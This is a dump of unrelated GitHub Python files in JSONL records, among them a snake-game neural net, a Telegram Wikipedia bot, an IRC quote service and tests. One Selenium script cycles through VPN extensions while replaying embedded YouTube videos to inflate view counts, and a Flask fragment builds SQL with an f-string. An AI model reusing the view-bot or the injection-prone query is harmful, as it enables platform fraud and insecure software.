WHERE ID={id}')\r\n customer = mycursor.fetchone()\r\n return render_template('customer_detail.html', customer = customer)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"Godswill121/market","sub_path":"controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17455653614","text":"import os\nimport yaml\n\nfrom brandon.builders.docs import Builder\n\n\ndef test_config_file(tmp_path, app):\n Builder(app=app, output_path=tmp_path).build()\n config_file = os.path.join(tmp_path, f\"{app.exec}-docs\", \"mkdocs.yml\")\n\n with open(config_file) as fp:\n config = yaml.full_load(fp)\n\n assert config[\"site_name\"] == app.name\n assert config[\"theme\"][\"name\"] == \"material\"\n assert config[\"repo_url\"] == app.url\n assert config[\"nav\"] == [\n {\"Home\": \"index.md\"},\n {\n \"Reference\": [\n {\n \"Commands\": [\n {\n \"group1\": [\n {\"comm1\": \"reference/group1/comm1.md\"},\n {\"comm3\": \"reference/group1/comm3.md\"},\n ]\n },\n {\"comm2\": \"reference/comm2.md\"},\n ]\n },\n {\"Schemas\": [{\"Enums\": \"reference/enums.md\"}]},\n ]\n },\n ]\n\n\ndef test_page_creation(tmp_path, app):\n Builder(app=app, output_path=tmp_path).build()\n pages_dir = os.path.join(tmp_path, f\"{app.exec}-docs\", \"docs\")\n ref_pages_dir = os.path.join(pages_dir, \"reference\")\n\n with open(os.path.join(pages_dir, \"index.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# {app.name}\")\n\n with open(os.path.join(ref_pages_dir, \"group1\", \"comm1.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# comm1\")\n\n with open(os.path.join(ref_pages_dir, \"comm2.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# comm2\")\n\n with 
open(os.path.join(ref_pages_dir, \"enums.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# Enums\")\n","repo_name":"wmorellato/brandon","sub_path":"tests/builders/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32161160054","text":"import time\nimport cv2\n\nnum=0\n\n# Initialize the camera\ncap = cv2.VideoCapture(0)\n\n# Set the resolution of the camera\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n\n# Wait for the camera to warm up\ntime.sleep(2)\n\nwhile 1:\n # Capture an image from the camera\n ret, img = cap.read()\n\n img=cv2.rotate(img,cv2.ROTATE_90_CLOCKWISE)\n cv2.imshow('Img',img)\n\n k = cv2.waitKey(2)\n\n if k == ord('q'):\n break\n elif k == ord('s'): # wait for 's' key to save and exit\n cv2.imwrite('images/img' + str(num) + '.png', img)\n print(\"image saved!\")\n num += 1\n\n#close the window\ncv2.destroyAllWindows()\n\n","repo_name":"crowww100/CameraCalibration","sub_path":"getImages.py","file_name":"getImages.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21211216461","text":"import sys\ninput = sys.stdin.readline\n\nn, min_height = map(int, input().split())\nheights = list(map(int, input().split()))\n\nstart = 0\nend = max(heights)\nresult = 0\nwhile start <= end:\n total = 0\n mid = (start + end) // 2\n\n for t in heights:\n if t - mid > 0:\n total += t - mid\n\n # 절단기의 높이를 늘리면 더 적은 양의 떡이 남고, 낮추면 더 많이 남는다\n # 자른 떡의 양이 min_height이 되지 않는다면 절단기의 높이를 낮춰야 한다 (decrease mid)\n if total < min_height:\n end = mid - 1\n else: # 자른 떡의 양이 min_height과 같거나 그보다 클 때는 절단기의 높이를 늘려야 한다(increase mid)\n result = mid\n start = mid + 1\n\n\n\nprint(total)\n","repo_name":"kimkimj/Algorithm","sub_path":"python/BinarySearch/makingTtekbooki.py","file_name":"makingTtekbooki.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42724249315","text":"from turtle import pos\nimport pygame\nimport sys\nfrom random import randint\nimport numpy as np\n\nfrom ai_architecture import NeuralNetwork, get_input\nfrom read_write import read_last_generation\n\nclass Snake():\n \n def __event_handler(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP or event.key == ord('z') and self.speed != [0,-1]:\n self.key = [0,1]\n elif event.key == pygame.K_DOWN or event.key == ord('s') and self.speed != [0,1]:\n self.key = [0,-1]\n elif event.key == pygame.K_RIGHT or event.key == ord('d') and self.speed != [-1,0]:\n self.key = [1,0]\n elif event.key == pygame.K_LEFT or event.key == ord('q') and self.speed != [1,0]:\n self.key = [-1,0]\n \n elif event.key == ord(\"i\"):\n self.output_handler(1)\n elif event.key == ord(\"j\"):\n self.output_handler(0)\n elif event.key == ord(\"l\"):\n self.output_handler(2)\n \n def output_handler(self, output):\n for key, value in self.output_converter.items():\n if output == key:\n for i in range(4):\n if self.speed == value[i][0]:\n self.key = value[i][1]\n break\n \n def __speed_management(self):\n self.speed = self.key[:]\n \n if self.speed[0] == 1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0] + self.square_size,\n self.snake_pos[0][1],\n ])\n elif self.speed[0] 
== -1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0] - self.square_size,\n self.snake_pos[0][1],\n ])\n elif self.speed[1] == 1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0],\n self.snake_pos[0][1] - self.square_size,\n ])\n elif self.speed[1] == -1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0],\n self.snake_pos[0][1] + self.square_size,\n ])\n self.snake_pos.pop(-1)\n \n def __colision_checker(self):\n if self.snake_pos[0][0] == self.food_pos[0][0] and self.snake_pos[0][1] == self.food_pos[0][1]:\n self.score += 1\n self.last_eat = 0\n self.__generate_pos_food()\n\n for tail in self.snake_pos[1:]:\n if self.snake_pos[0] == tail:\n self.alive = False\n \n if self.snake_pos[-1][0] == self.food_pos[-1][0] and self.snake_pos[-1][1] == self.food_pos[-1][1]:\n self.snake_pos.append(self.snake_pos[-1])\n self.food_pos.pop(-1)\n \n if self.snake_pos[0][0] < 0 or self.snake_pos[0][0] > (self.nb_square*self.square_size)-self.square_size:\n self.alive = False\n elif self.snake_pos[0][1] < 0 or self.snake_pos[0][1] > (self.nb_square*self.square_size)-self.square_size:\n self.alive = False\n \n def updater(self):\n self.step += 1\n self.last_eat += 1\n self.__speed_management()\n self.__colision_checker()\n \n def __gfx_updater(self):\n \n self.game_window.fill(pygame.Color(0,0,0))\n \n for body in self.snake_pos:\n pygame.draw.rect(\n self.game_window,\n pygame.Color(255,255,255),\n pygame.Rect(\n body[0], body[1],\n self.square_size, self.square_size,\n ),\n )\n \n pygame.draw.rect(\n self.game_window,\n pygame.Color(255,0,0),\n pygame.Rect(\n self.food_pos[0][0], self.food_pos[0][1],\n self.square_size, self.square_size,\n ),\n )\n \n def __generate_pos_food(self):\n possibilities = np.array(np.meshgrid(\n np.arange(self.nb_square), np.arange(self.nb_square)\n )).T.reshape(-1,2)\n scaled_snakepos = [[\n value[0] // self.square_size,\n value[1] // self.square_size,\n ] for value in self.snake_pos]\n possibilities = np.delete(possibilities, np.where([((value == scaled_snakepos).all(axis=1)).any() for value in possibilities]), axis=0)\n self.food_pos.insert(0, list(\n possibilities[randint(0, possibilities.shape[0]-1)]*self.square_size\n ))\n \n def get_results(self):\n return {'alive':self.alive, 'score':self.score, 'step':self.step, 'last_eat':self.last_eat}\n \n def get_info(self):\n #print(self.food_pos)\n return [\n self.speed,\n [\n self.snake_pos[0][0] // self.square_size,\n self.snake_pos[0][1] // self.square_size,\n ],\n [\n [\n tailpos[0] // self.square_size,\n tailpos[1] // self.square_size, \n ] for tailpos in self.snake_pos[1:]\n ],\n [\n self.food_pos[0][0] // self.square_size,\n self.food_pos[0][1] // self.square_size,\n ],\n self.nb_square,\n ]\n \n def __init__(\n self,\n display_mod: str = False,\n nb_square: int = 20,\n square_size: int = 30,\n refresh_time: int = 10,\n ):\n \n self.nb_square = nb_square\n self.square_size = square_size\n self.refresh_time = refresh_time\n \n self.output_converter = {\n 0: [\n [[0,1], [-1,0]],\n [[0,-1], [1,0]],\n [[1,0], [0,1]],\n [[-1,0], [0,-1]],\n ],\n 1: [\n [[0,1], [0,1]],\n [[0,-1], [0,-1]],\n [[1,0], [1,0]],\n [[-1,0], [-1,0]],\n ],\n 2: [\n [[0,1], [1,0]],\n [[0,-1], [-1,0]],\n [[1,0], [0,-1]],\n [[-1,0], [0,1]],\n ],\n }\n \n self.frame_size = (self.nb_square * self.square_size, self.nb_square * self.square_size)\n self.snake_pos = [[self.nb_square // 2 * self.square_size]*2]\n self.food_pos = []\n self.key, self.speed = [0,1], [0,1]\n self.alive = True\n self.score, self.step, self.last_eat = [0]*3\n 
self.__generate_pos_food()\n \n if display_mod == \"training\":\n pass\n \n elif display_mod == \"playing\":\n \n errors = pygame.init()\n self.game_window = pygame.display.set_mode(self.frame_size)\n while self.alive:\n self.__event_handler()\n self.updater()\n self.__gfx_updater()\n pygame.display.update()\n pygame.time.Clock().tick(self.refresh_time)\n \n elif display_mod == \"testing\":\n weights = read_last_generation()[0]\n model = NeuralNetwork()\n model.set_weights(weights)\n \n errors = pygame.init()\n self.game_window = pygame.display.set_mode(self.frame_size)\n while self.alive and self.last_eat < 400:\n self.__event_handler()\n \n x = get_input(*self.get_info())\n y = model.predict(x)\n self.output_handler(y.argmax())\n \n self.updater()\n self.__gfx_updater()\n pygame.display.update()\n pygame.time.Clock().tick(self.refresh_time)\n \n else:\n print(\"No Display Mode Set\")\n\nif __name__ == \"__main__\":\n snake = Snake(display_mod=\"testing\", refresh_time=100)","repo_name":"GuyChahine/GeneticNNSnakeWorking","sub_path":"snake_tail.py","file_name":"snake_tail.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42084438246","text":"import logging\n\nfrom typing import Optional\n\n\"\"\"\ndefault hook and boilerplate hook template\nIMPORTANT NOTES:\n - hook function name must be \"run_hook\"\n - payload is a dict containing the record\n\"\"\"\n\nlog = logging.getLogger(__name__)\n\n\ndef run_hook(payload: Optional[dict] = None):\n try:\n # put your code here\n log.info(\"im a stupid hook\")\n except Exception:\n log.error(\"im a stupid broken hook\")","repo_name":"tbotnz/cmdboss","sub_path":"extensibles/hooks/sample_webhook.py","file_name":"sample_webhook.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"11482279921","text":"import random, time\nfrom selenium.common.exceptions import WebDriverException, NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.service import Service\nfrom selenium import webdriver\n\n\ndef connect_to_cyberghost_vpn(driver):\n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1])\n # countrys = ['United States','Romania', 'Germany', 'Netherlands' ]\n countrys = ['United States','Romania', 'Netherlands' ]\n country = countrys[random.randint(0,3)]\n driver.get('chrome-extension://ffbkglfijbcbgblgflchnbphjdllaogb/index.html')\n time.sleep(5)\n # Disconnect if already connected\n connected_btn = driver.find_elements(By.CLASS_NAME, 'dark outer-circle connected')\n connected_btn[0].click() if connected_btn else None\n\n # Select country\n countries_drop_down_btn = driver.find_elements(By.TAG_NAME, 'mat-select-trigger')\n countries_drop_down_btn[0].click() if countries_drop_down_btn else None\n total_option_country = driver.find_elements(By.TAG_NAME, 'mat-option')\n for i in total_option_country:\n i_id = i.get_attribute('id')\n country_text_ele = i.find_element(By.XPATH, f\"//*[@id='{i_id}']/span\")\n country_text = country_text_ele.text\n if country == country_text:\n country_text_ele.click()\n break\n print(f\"VPN connected to {country}\")\n 
time.sleep(2)\n connect_btn = driver.find_elements(By.CLASS_NAME, 'disconnected')\n connect_btn[0].click() if connect_btn else None\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"Connected to:\"]')))\n except Exception as e:\n print(f\"Error: {e}\")\n # Checking is the VPN connected or not\n error = find_element(driver,'//*[text()=\"connectPage.error\"]')\n if error:\n return False\n # while error:\n # country = countrys[random.randint(0,3)]\n # countries_drop_down_btn = driver.find_elements(By.TAG_NAME, 'mat-select-trigger')\n # countries_drop_down_btn[0].click() if countries_drop_down_btn else None\n # total_option_country = driver.find_elements(By.TAG_NAME, 'mat-option')\n # for i in total_option_country:\n # i_id = i.get_attribute('id')\n # country_text_ele = i.find_element(By.XPATH, f\"//*[@id='{i_id}']/span\")\n # country_text = country_text_ele.text\n # if country == country_text:\n # country_text_ele.click()\n # time.sleep(2)\n # connect_btn = driver.find_elements(By.CLASS_NAME, 'disconnected')\n # connect_btn[0].click() if connect_btn else None\n # error = find_element(driver,'//*[text()=\"connectPage.error\"]')\n \n connected_text = driver.find_elements(By.XPATH, '//*[text()=\"Connected to:\"]')\n if connected_text:\n time.sleep(30)\n disconnect = find_element(driver,'//*[@class=\"dark outer-circle connected\"]')\n disconnect.click()\n return True\n\n \ndef connect_touchvpn(driver):\n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1])\n driver.get('chrome-extension://bihmplhobchoageeokmgbdihknkjbknd/panel/index.html')\n time.sleep(2)\n time.sleep(3)\n country = ['Singapore','Germany','United Kingdom','United States']\n country = random.choice(country)\n time.sleep(1)\n driver.find_element(By.XPATH,'//*[@class=\"location\"]').click()\n time.sleep(3)\n locations = find_element(driver,'//*[@class=\"list\"]')\n time.sleep(1)\n location = find_elements(locations,'//*[@class=\"row\"]')\n location[random.randint(0,7)].click()\n time.sleep(2)\n driver.find_element(By.XPATH,'//*[@id=\"ConnectionButton\"]').click()\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"Stop\"]')))\n except Exception as e:\n print(f\"Error: {e}\")\n connected = driver.find_element(By.XPATH,'//*[text()=\"Stop\"]')\n if connected:\n time.sleep(20)\n connected.click()\n return True\n else:\n return False\n \ndef connect_turbo(driver): \n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1]) \n country = ['Singapore','Germany','United Kingdom','United States']\n country = country[random.randint(0,3)]\n # time.sleep(1)\n # window_handles = driver.window_handles\n # time.sleep(1)\n # driver.switch_to.window(window_handles[0])\n time.sleep(1)\n driver.get('chrome-extension://bnlofglpdlboacepdieejiecfbfpmhlb/popup/popup.html')\n time.sleep(2)\n location = find_element(driver,'/html/body/div/div/div[4]/div[1]/div[3]')\n if location:\n location.click()\n time.sleep(5)\n searver_list = find_element(driver,'/html/body/div/div/div[3]/div[1]/div[3]/div[2]/div')\n time.sleep(1)\n countrys = find_elements(searver_list,'.//div')\n countrys[random.randint(0,3)].click()\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"CONNECTED\"]')))\n except Exception as e:\n driver.find_element(By.XPATH,'//*[@class=\"start-btn\"]').click()\n wait.until(ec.presence_of_element_located((By.XPATH, 
'//*[text()=\"CONNECTED\"]')))\n print(f\"Error: {e}\")\n connected = driver.find_element(By.XPATH,'//*[text()=\"CONNECTED\"]')\n if connected:\n return True\n else:\n return False\n\ndef find_element(driver,xpath,locator=By.XPATH,timeout=10):\n wait = WebDriverWait(driver, timeout)\n try:\n ele = wait.until(EC.presence_of_element_located((locator, xpath)))\n return ele\n except NoSuchElementException:\n pass\n except Exception as e:\n pass\n\ndef find_elements(driver, xpath, locator=By.XPATH, timeout=10):\n wait = WebDriverWait(driver, timeout)\n try:\n elements = wait.until(EC.presence_of_all_elements_located((locator, xpath)))\n return elements\n except NoSuchElementException:\n pass\n except Exception as e:\n pass\n \ndef click_popup(driver, element):\n driver.execute_script(\n \"arguments[0].scrollIntoViewIfNeeded();\", element)\n time.sleep(1)\n element.click()\n\ndef play_all_frame(driver):\n iframes = find_elements(driver,'iframe', By.TAG_NAME)\n for i in iframes:\n driver.switch_to.frame(i)\n try:\n driver.find_element(By.CSS_SELECTOR, '[title^=\"Pause (k)\"]')\n except WebDriverException:\n try:\n driver.find_element(\n By.CSS_SELECTOR, 'button.ytp-large-play-button.ytp-button').send_keys(Keys.ENTER)\n except WebDriverException:\n try:\n driver.find_element(\n By.CSS_SELECTOR, '[title^=\"Play (k)\"]').click()\n except WebDriverException:\n try:\n driver.execute_script(\n \"document.querySelector('button.ytp-play-button.ytp-button').click()\")\n except WebDriverException:\n pass\n driver.switch_to.default_content()\n time.sleep(2)\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--mute-audio')\noptions.add_extension(r'./Touch-VPNSecure-and-unlimited-VPN-proxy.crx')\noptions.add_extension(r'./Turbo-VPNSecure-Free-VPN-Proxy.crx')\noptions.add_extension(r'./cyberghost.crx')\ndriver = webdriver.Chrome(options=options)\ndriver.get('https://youtube-views.ytpremium35.repl.co/')\ntext_box = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.ID, 'urlvideo')))\ntext_box.clear()\ntext_box.send_keys('https://www.youtube.com/watch?v=g4FUGtd1piY&ab_channel=armordriller')\nviews = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.ID, 'nbrvideo')))\nviews.clear()\nviews.send_keys('5')\nplay_btn = find_element(driver,'//button[@onclick=\"play();\"]')\nplay_btn.click()\ntime.sleep(10)\nplay_all_frame(driver)\nwhile True:\n for i in range(2):\n if i == 0:\n connect_to_cyberghost_vpn(driver)\n elif i ==1:\n connect_touchvpn(driver)\n else:\n connect_turbo(driver)\n time.sleep(30)\n \nbreakpoint()\n\n\n","repo_name":"riken-khadela/xana-website_viewer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39642329728","text":"\"\"\"adding vgas, vgas0, temperature, ppm, rgain\n\nRevision ID: d7200c24b55c\nRevises: 39a9db1ad708\nCreate Date: 2020-05-24 01:08:43.985390\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd7200c24b55c'\ndown_revision = '39a9db1ad708'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('reading', sa.Column('ppm', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('rgain', sa.Integer(), nullable=True))\n op.add_column('reading', sa.Column('temperature', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('vgas', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('vgas0', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('reading', 'vgas0')\n op.drop_column('reading', 'vgas')\n op.drop_column('reading', 'temperature')\n op.drop_column('reading', 'rgain')\n op.drop_column('reading', 'ppm')\n # ### end Alembic commands ###\n","repo_name":"androidside/server-pollution-sensor-argon","sub_path":"migrations/versions/d7200c24b55c_adding_vgas_vgas0_temperature_ppm_rgain.py","file_name":"d7200c24b55c_adding_vgas_vgas0_temperature_ppm_rgain.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34929116324","text":"import types\nimport telebot\nimport wikipedia\n\n# ссылка на бота t.me/wikis_new_bot\n\nbot = telebot.TeleBot('')\nglobal lang\nlang = 'ru'\n\n# ====================== comands ====================================\n# Команда /start\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n user_full_name = message.from_user.full_name\n bot.send_message(message.chat.id, F\"Привет, {user_full_name}! Я бот для поиска значения слов. С помощью команды /help вы можете узнать мои возможности\\n Отправьте мне любое слово и я найду его значение в Wikipedia\")\n\n@bot.message_handler(commands=['help'])\ndef help_message(message):\n bot.send_message(message.chat.id, \"Я могу найти значение необходимого вам слова в Wikipedia. По умолчанию я ищу русские слова. 
Для смены языка введите /change_language\")\n\n@bot.message_handler(commands=['change_language'])\ndef help_message(message):\n markup = language_markup()\n bot.send_message(message.chat.id, text='Выберите язык для поиска слов', reply_markup=markup)\n# ==================================================================\n\n#===================== markup ======================================\n# markup с валютами\ndef language_markup():\n markup = telebot.types.InlineKeyboardMarkup()\n buttons_ru = telebot.types.InlineKeyboardButton(text='Русский', callback_data='ru')\n buttons_en = telebot.types.InlineKeyboardButton(text='Английский', callback_data='en')\n markup.add(buttons_ru,buttons_en)\n return markup\n\n# def yes_or_no_markup():\n# markup = telebot.types.InlineKeyboardMarkup()\n# buttons_y = telebot.types.InlineKeyboardButton(text='Найти значение слова на просторах интернета', callback_data='Yes')\n# markup.add(buttons_y)\n# return markup \n# ==================================================================\n\n# ===================== callbacks ======================================\n@bot.callback_query_handler(func=lambda call: True)\ndef bot_query_handler(call):\n \n global lang\n if (call.data == \"en\"):\n lang = 'en'\n bot.answer_callback_query(callback_query_id=call.id, text=\"Смена языка.....\")\n bot.send_message(call.message.chat.id, 'Язык поиска слов сменился на английский')\n elif (call.data == \"ru\") :\n lang = 'ru'\n bot.answer_callback_query(callback_query_id=call.id, text=\"Смена языка.....\")\n bot.send_message(call.message.chat.id, 'Язык поиска слов сменился на русский')\n # elif (call.data == \"Yes\") :\n # bot.send_message(call.message.chat_id,f\"\"\"\"\"\")\n\n\n# ==================================================================\n\n# Поиск слова\n@bot.message_handler(content_types=['text'])\ndef get_word_message(message):\n try:\n wikipedia.set_lang(lang)\n result = wikipedia.summary(str(message.text))\n web = wikipedia.page(str(message.text))\n \n bot.send_message(message.chat.id, text='Вот что я смог найти:')\n bot.send_message(message.chat.id, result)\n markup = telebot.types.InlineKeyboardMarkup()\n button1 = telebot.types.InlineKeyboardButton(\n text=\"Статья в википедии\", url=str(web.url))\n markup.add(button1)\n bot.send_message(message.chat.id, \"Ссылка на полную статью\", reply_markup=markup)\n except:\n bot.send_message(message.chat.id, text='К сожалению, я не смог найти данное слово в базе Wikipedia')\n markup = telebot.types.InlineKeyboardMarkup()\n button1 = telebot.types.InlineKeyboardButton(\n text=\"Результаты поиска в Яндекс\", url=\"\"\"https://yandex.ru/search/?text=\"\"\"\n + message.text.replace(' ', \"+\") +\n \"\"\"&lr=50&search_source=yaru_desktop_common\"\"\")\n markup.add(button1)\n bot.send_message(\n message.chat.id, \"Можете найти в интернете по ссылке:\", reply_markup=markup)\nbot.infinity_polling()\n\n\n","repo_name":"Chashch-Anya/WikiBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10800109376","text":"from datetime import datetime\nfrom peewee import CharField, TextField, DateTimeField, fn\nfrom whoosh.analysis import StemmingAnalyzer\nimport whoosh.fields\nimport whoosh.index\nimport whoosh.query\nimport whoosh.writing\nfrom whoosh.qparser import QueryParser\n\nfrom ..db import Model, database\n\nfrom ..service import Service\nfrom ..auth import requires_permission\n\nservice = 
Service(__name__)\n\nstem_ana = StemmingAnalyzer()\n\nWHOOSH_SCHEMA = whoosh.fields.Schema(\n id=whoosh.fields.NUMERIC(unique=True, stored=True),\n quote=whoosh.fields.TEXT(analyzer=stem_ana),\n by=whoosh.fields.ID(),\n ts=whoosh.fields.DATETIME(),\n channel=whoosh.fields.ID(),\n network=whoosh.fields.ID()\n)\n\n\nclass Quote(Model):\n by = CharField(255)\n quote = TextField()\n channel = CharField(255)\n network = CharField(255)\n ts = DateTimeField()\n\n @property\n def as_text(self):\n return \"Quote {id}: {quote}\".format(\n id=self.id,\n quote=self.quote\n )\n\n class Meta:\n indexes = (\n ((\"channel\", \"network\"), False),\n )\n\n\n@service.setup\ndef initialize_model(bot):\n config = service.config_for(bot)\n storage = service.storage_for(bot)\n\n if not whoosh.index.exists_in(config[\"index_path\"]):\n storage.index = whoosh.index.create_in(config[\"index_path\"], WHOOSH_SCHEMA)\n else:\n storage.index = whoosh.index.open_dir(config[\"index_path\"])\n\n storage.quote_qp = QueryParser(\"quote\", schema=WHOOSH_SCHEMA)\n Quote.create_table(True)\n\n\n@service.command(r\"add quote (?P.+)$\", mention=True)\n@service.command(r\"!quote add (?P.+)$\")\n@requires_permission(\"quote\")\ndef add_quote(client, target, origin, quote):\n storage = service.storage_for(client.bot)\n\n with database.transaction():\n quote = Quote.create(by=origin, quote=quote, channel=target,\n network=client.network, ts=datetime.utcnow())\n quote.save()\n\n with storage.index.writer() as writer:\n writer.add_document(id=quote.id, by=quote.by,\n quote=quote.quote, channel=quote.channel,\n network=quote.network, ts=quote.ts)\n\n client.message(target, \"{origin}: Added quote {qid}.\".format(\n origin=origin,\n qid=quote.id\n ))\n\n\n@service.command(r\"[iI](?: am|'m)(?: very| quite| extremely) butthurt about quote (?P\\d+)$\", mention=True)\n@service.command(r\"(?:destroy|remove|delete) quote (?P\\d+)$\", mention=True)\n@service.command(r\"!quote del (?P\\d+)$\")\n@requires_permission(\"quote\")\ndef delete_quote(client, target, origin, qid: int):\n storage = service.storage_for(client.bot)\n\n if not Quote.select() \\\n .where(Quote.id == qid,\n Quote.network == client.network,\n Quote.channel == target).exists():\n client.message(target, \"{origin}: That's not a quote.\".format(\n origin=origin\n ))\n return\n\n with database.transaction():\n Quote.delete().where(Quote.id == qid).execute()\n storage.index.delete_by_term(\"id\", qid)\n\n client.message(target, \"{origin}: Deleted quote {qid}.\".format(\n origin=origin,\n qid=qid\n ))\n\n\n@service.command(r\"what is quote (?P\\d+)\\??$\", mention=True)\n@service.command(r\"read quote (?P\\d+)$\", mention=True)\n@service.command(r\"!quote read (?P\\d+)$\")\ndef read_quote(client, target, origin, qid: int):\n q = Quote.select() \\\n .where(Quote.id == qid,\n Quote.network == client.network,\n Quote.channel == target)\n\n if not q.exists():\n client.message(target, \"{origin}: That's not a quote.\".format(\n origin=origin\n ))\n return\n\n quote = q[0]\n\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quote.as_text\n ))\n\n\n@service.command(r\"(?:give me a )?random quote$\", mention=True)\n@service.command(r\"!quote rand$\")\ndef rand_quote(client, target, origin):\n q = Quote.select() \\\n .where(Quote.network == client.network, Quote.channel == target) \\\n .order_by(fn.Random()) \\\n .limit(1)\n\n if not q.exists():\n client.message(target, \"{origin}: Couldn't find any quotes.\".format(\n origin=origin\n ))\n return\n\n quote = 
q[0]\n\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quote.as_text\n ))\n\n\n@service.command(r\"find (?:a )?quote matching (?P.+)$\", mention=True)\n@service.command(r\"!quote find (?P.+)$\")\ndef find_quote(client, target, origin, query):\n storage = service.storage_for(client.bot)\n\n q = storage.quote_qp.parse(query)\n\n with storage.index.searcher() as searcher:\n results = searcher.search(q, limit=None)\n qids = [r[\"id\"] for r in results]\n\n quotes = list(Quote.select()\n .where(Quote.network == client.network,\n Quote.channel == target,\n Quote.id << qids))\n\n if not quotes:\n client.message(target, \"{origin}: Couldn't find any quotes.\".format(\n origin=origin\n ))\n elif len(quotes) == 1:\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quotes[0].as_text\n ))\n else:\n client.message(target, \"{origin}: Found {num} quotes: {qids}\".format(\n origin=origin,\n num=len(qids),\n qids=\", \".join(str(qid) for qid in sorted(qids))\n ))\n","repo_name":"mrvelic/kochira","sub_path":"kochira/services/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3248370316","text":"import numpy as np\nfrom enum import Enum\n\n\nclass NormalDist():\n def __init__(self, mean, variance):\n self.mean = mean\n self.variance = variance\n self.std = np.sqrt(self.variance)\n \n @classmethod\n def generate_random_dist(cls):\n mean = np.random.uniform(-1, 1)\n var = np.random.uniform(0.5, 1.5)\n return cls(mean, var)\n","repo_name":"chieni/dose_allocation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13243315323","text":"\"\"\"Prism DEM dataset.\"\"\"\nimport gzip\nimport tarfile\nfrom pathlib import Path\nfrom typing import Literal\nfrom typing import Union\nimport numpy as np\nimport xarray as xr\nfrom rasterio.io import MemoryFile\nfrom zampy.datasets import converter\nfrom zampy.datasets import utils\nfrom zampy.datasets import validation\nfrom zampy.datasets.dataset_protocol import SpatialBounds\nfrom zampy.datasets.dataset_protocol import TimeBounds\nfrom zampy.datasets.dataset_protocol import Variable\nfrom zampy.datasets.dataset_protocol import copy_properties_file\nfrom zampy.datasets.dataset_protocol import write_properties_file\nfrom zampy.reference.variables import VARIABLE_REFERENCE_LOOKUP\nfrom zampy.reference.variables import unit_registry\nfrom zampy.utils import regrid\n\n\nVALID_NAME_FILES = [\n Path(__file__).parent / \"assets\" / \"dem_filenames_glo30.txt.gz\",\n Path(__file__).parent / \"assets\" / \"dem_filenames_glo90.txt.gz\",\n]\n\n\n## Ignore missing class/method docstrings: they are implemented in the Dataset class.\n# ruff: noqa: D102\n\n\nclass PrismDEM:\n \"\"\"The Prism Digital Elevation Model.\"\"\"\n\n name: str\n data_url: 